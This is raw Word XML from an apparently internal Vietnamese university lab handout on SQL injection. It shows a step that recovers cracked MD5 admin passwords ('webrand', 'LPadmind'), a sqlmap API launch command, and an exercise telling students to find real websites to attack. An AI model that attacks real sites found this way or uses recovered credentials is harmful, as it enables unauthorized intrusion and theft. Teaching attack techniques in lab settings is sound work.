    <w:p w14:paraId="3C388F42" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">Kết quả đã có username và password mã hóa MD5. Thử decrypt 2 đoạn mã này sử dụng các công cụ hiện có trên mạng và kết quả là mật khẩu cho Administrator là </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>webrand</w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve"> và cho AdminToto là </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LPadmind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCAE6B" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t>NSD cũng có thể tấn công các table quan trọng khác trong database này để lấy được thông tin mình muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C77179" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C951F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc36915688"/>
      <w:bookmarkStart w:id="15" w:name="_Toc110279695"/>
      <w:bookmarkStart w:id="16" w:name="_Toc175580492"/>
      <w:bookmarkStart w:id="17" w:name="_Toc175587847"/>
      <w:r w:rsidRPr="001B783D">
        <w:t>Công cụ sqlmap GUI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="4358F132" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ python /usr/share/sqlmap/sqlmapapi.py -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1BBB93" w14:textId="12B2911B" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00B15533" w:rsidP="00C951F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc175587848"/>
      <w:r>
        <w:t>Bài tập</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1630CE2D" w14:textId="77777777" w:rsidR="005C68C9" w:rsidRDefault="001E77E8" w:rsidP="007D73ED">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Thực hiện tìm kiếm một số trang Web </w:t>
      </w:r>
      <w:r w:rsidR="0031772F" w:rsidRPr="008A1FD0">
        <w:t>để tấn công SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D7D51" w14:textId="66318E66" w:rsidR="00B15533" w:rsidRPr="00B15533" w:rsidRDefault="00B15533" w:rsidP="007D73ED">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Cài đặt sqlmap GUI để thực hiện tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3804E52A" w14:textId="77777777" w:rsidR="00A03B9B" w:rsidRPr="008A1FD0" w:rsidRDefault="00A03B9B" w:rsidP="00A03B9B">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:left="284" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BE8A4F" w14:textId="07A68C2D" w:rsidR="00A03B9B" w:rsidRPr="008A1FD0" w:rsidRDefault="00A03B9B" w:rsidP="00A03B9B">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Tài liệu lưu hành nội bộ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E69325" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="0031173D">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>-----------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA7DBDE" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00816F7F"/>
    <w:p w14:paraId="05AA9CEF" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00816F7F">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5322A9" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRDefault="00816F7F"/>
    <w:sectPr w:rsidR="00816F7F">
      <w:headerReference w:type="default" r:id="rId21"/>
      <w:footerReference w:type="default" r:id="rId22"/>
      <w:pgSz w:w="11907" w:h="16840"/>
      <w:pgMar w:top="1134"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FD2E0" w14:textId="77777777" w:rsidR="008B577A" w:rsidRPr="008A1FD0" w:rsidRDefault="008B577A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2FF4F4DD" w14:textId="77777777" w:rsidR="008B577A" w:rsidRPr="008A1FD0" w:rsidRDefault="008B577A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="596E04E6" w14:textId="77777777" w:rsidR="008B577A" w:rsidRPr="008A1FD0" w:rsidRDefault="008B57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153515"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="5E0605A0" w14:textId="112C528B" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="69DCF625">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:tabs>
            <w:tab w:val="right" w:pos="9639"/>
          </w:tabs>
          <w:ind w:firstLine="0"/>
        </w:pPr>
        <w:r w:rsidRPr="008A1FD0">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
          </w:rPr>
          <w:t>KhoaCNTT-Trường ĐHBK, ĐHĐN</w:t>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:tab/>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="008A1FD0">
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="2812C26A" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="0081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0424C" w14:textId="77777777" w:rsidR="008B577A" w:rsidRPr="008A1FD0" w:rsidRDefault="008B577A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="355CEA64" w14:textId="77777777" w:rsidR="008B577A" w:rsidRPr="008A1FD0" w:rsidRDefault="008B577A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="285C75CE" w14:textId="77777777" w:rsidR="008B577A" w:rsidRPr="008A1FD0" w:rsidRDefault="008B577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19062" w14:textId="5B930126" w:rsidR="00620047" w:rsidRPr="008A1FD0" w:rsidRDefault="00620047">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r w:rsidRPr="008A1FD0">
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="319FE50C" wp14:editId="16CF244A">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6013450</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-139700</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="241200" cy="241200"/>
          <wp:effectExtent l="0" t="0" r="6985" b="6985"/>
          <wp:wrapNone/>
          <wp:docPr id="629311327" name="Picture 629311327" descr="A logo with arrow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1327" name="Picture 1" descr="A logo with arrows and a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CA02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CA9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549D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3A5E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E2E4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A03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401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F0B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8E6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7ADD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E70C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="691823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43A32C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDEE51F0"/>
    <w:lvl w:ilvl="0" w:tplc="E4588E52">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="txtGachDong"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="72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E0EED7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97CA0D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DC1C9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454B36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F3AB7A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4DEDC2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3425E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662787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8C2022D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48FE9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8F5668"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B656AC52"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>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0916823"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD303A6C"/>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633A747D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47C0E75C"/>
    <w:lvl w:ilvl="0" w:tplc="4C5A9F02">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="txtTaiLieuThamKhao"/>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2280D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B104A0A"/>
    <w:lvl w:ilvl="0" w:tplc="EC1EB9BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="txtHoaThi"/>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56E4576"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BF20CC0"/>
    <w:lvl w:ilvl="0" w:tplc="EDDEF0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50209160">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="7413664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7732704">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="597523637">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="3279033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82469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9803317">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="158235612">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="74205970">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1180511202">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1029720251">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1840654357">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1453672486">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="481041163">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="870804331">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1012342041">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2119062576">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2128347268">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2053965739">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="36313862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58"/>
    <w:rsid w:val="00026A7D"/>
    <w:rsid w:val="00044491"/>
    <w:rsid w:val="000B272E"/>
    <w:rsid w:val="001001AD"/>
    <w:rsid w:val="00130F60"/>
    <w:rsid w:val="00157C4F"/>
    <w:rsid w:val="001631F0"/>
    <w:rsid w:val="001A3A44"/>
    <w:rsid w:val="001E77E8"/>
    <w:rsid w:val="00242AC9"/>
    <w:rsid w:val="00287A8A"/>
    <w:rsid w:val="002902BC"/>
    <w:rsid w:val="0031173D"/>
    <w:rsid w:val="0031772F"/>
    <w:rsid w:val="00393949"/>
    <w:rsid w:val="0042111E"/>
    <w:rsid w:val="004A5938"/>
    <w:rsid w:val="004C4587"/>
    <w:rsid w:val="004E4C7A"/>
    <w:rsid w:val="005332E8"/>
    <w:rsid w:val="005C68C9"/>
    <w:rsid w:val="006030B3"/>
    <w:rsid w:val="006129AB"/>
    <w:rsid w:val="00620047"/>
    <w:rsid w:val="00621B68"/>
    <w:rsid w:val="00643964"/>
    <w:rsid w:val="006557BB"/>
    <w:rsid w:val="0068458D"/>
    <w:rsid w:val="006913CF"/>
    <w:rsid w:val="006C1FD1"/>
    <w:rsid w:val="007136BE"/>
    <w:rsid w:val="00725E88"/>
    <w:rsid w:val="007466A3"/>
    <w:rsid w:val="0075075D"/>
    <w:rsid w:val="0075591E"/>
    <w:rsid w:val="007E5344"/>
    <w:rsid w:val="00804A96"/>
    <w:rsid w:val="00816F7F"/>
    <w:rsid w:val="008459D0"/>
    <w:rsid w:val="008463C9"/>
    <w:rsid w:val="00856A03"/>
    <w:rsid w:val="00862A38"/>
    <w:rsid w:val="00867106"/>
    <w:rsid w:val="00884A13"/>
    <w:rsid w:val="008A1FD0"/>
    <w:rsid w:val="008A4715"/>
    <w:rsid w:val="008B29EF"/>
    <w:rsid w:val="008B577A"/>
    <w:rsid w:val="008D066D"/>
    <w:rsid w:val="008F7C33"/>
    <w:rsid w:val="009A62F3"/>
    <w:rsid w:val="009E2153"/>
    <w:rsid w:val="009E3993"/>
    <w:rsid w:val="009F135D"/>
    <w:rsid w:val="00A03B9B"/>
    <w:rsid w:val="00A8028F"/>
    <w:rsid w:val="00B0789F"/>
    <w:rsid w:val="00B12E64"/>
    <w:rsid w:val="00B15533"/>
    <w:rsid w:val="00B369FA"/>
    <w:rsid w:val="00B531B3"/>
    <w:rsid w:val="00B73FBC"/>
    <w:rsid w:val="00BA02B7"/>
    <w:rsid w:val="00BB706A"/>
    <w:rsid w:val="00BC268F"/>
    <w:rsid w:val="00BF02A7"/>
    <w:rsid w:val="00C009DB"/>
    <w:rsid w:val="00C66B15"/>
    <w:rsid w:val="00C951F8"/>
    <w:rsid w:val="00CD5834"/>
    <w:rsid w:val="00CF1959"/>
    <w:rsid w:val="00D26F58"/>
    <w:rsid w:val="00D408F1"/>
    <w:rsid w:val="00D81DE8"/>
    <w:rsid w:val="00D83595"/>
    <w:rsid w:val="00D86FF1"/>
    <w:rsid w:val="00DF3C27"/>
    <w:rsid w:val="00E31B06"/>
    <w:rsid w:val="00E63C32"/>
    <w:rsid w:val="00E82AF6"/>
    <w:rsid w:val="00E97CBF"/>
    <w:rsid w:val="00EA6313"/>
    <w:rsid w:val="00ED4EBB"/>
    <w:rsid w:val="00EF7689"/>
    <w:rsid w:val="00F03A82"/>
    <w:rsid w:val="00F334DC"/>
    <w:rsid w:val="00F9409C"/>
    <w:rsid w:val="00FA62FA"/>
    <w:rsid w:val="00FB5FE5"/>
    <w:rsid w:val="00FC2D83"/>
    <w:rsid w:val="036BF589"/>
    <w:rsid w:val="04E5F3C5"/>
    <w:rsid w:val="0A0845CC"/>
    <w:rsid w:val="0F212C11"/>
    <w:rsid w:val="1C952D4C"/>
    <w:rsid w:val="24E794C7"/>
    <w:rsid w:val="2838A144"/>
    <w:rsid w:val="2D366EAB"/>
    <w:rsid w:val="2DC5D576"/>
    <w:rsid w:val="30F9C00D"/>
    <w:rsid w:val="3402E3E9"/>
    <w:rsid w:val="35A679DD"/>
    <w:rsid w:val="37A6B7A0"/>
    <w:rsid w:val="396BACD8"/>
    <w:rsid w:val="3FD6E55A"/>
    <w:rsid w:val="412CC248"/>
    <w:rsid w:val="431FEE7C"/>
    <w:rsid w:val="492045D4"/>
    <w:rsid w:val="4AA4C13E"/>
    <w:rsid w:val="4C3ADA38"/>
    <w:rsid w:val="51B87155"/>
    <w:rsid w:val="558AB511"/>
    <w:rsid w:val="558CA2AC"/>
    <w:rsid w:val="57CBC74E"/>
    <w:rsid w:val="595D94BE"/>
    <w:rsid w:val="5A6E8600"/>
    <w:rsid w:val="5BEC0675"/>
    <w:rsid w:val="5EE694BF"/>
    <w:rsid w:val="5F56FB38"/>
    <w:rsid w:val="5FBE3F65"/>
    <w:rsid w:val="613EC492"/>
    <w:rsid w:val="638299A5"/>
    <w:rsid w:val="63B2D126"/>
    <w:rsid w:val="68508220"/>
    <w:rsid w:val="69C977F9"/>
    <w:rsid w:val="69DCF625"/>
    <w:rsid w:val="6F3106DA"/>
    <w:rsid w:val="7D68F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CBD1B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7EE809B2-71C5-46A1-A6F0-8F99C18C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3D"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="atLeast"/>
      <w:ind w:firstLine="360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:noProof/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C951F8"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="2"/>
      </w:numPr>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C951F8"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:color w:val="000000"/>
      <w:kern w:val="36"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
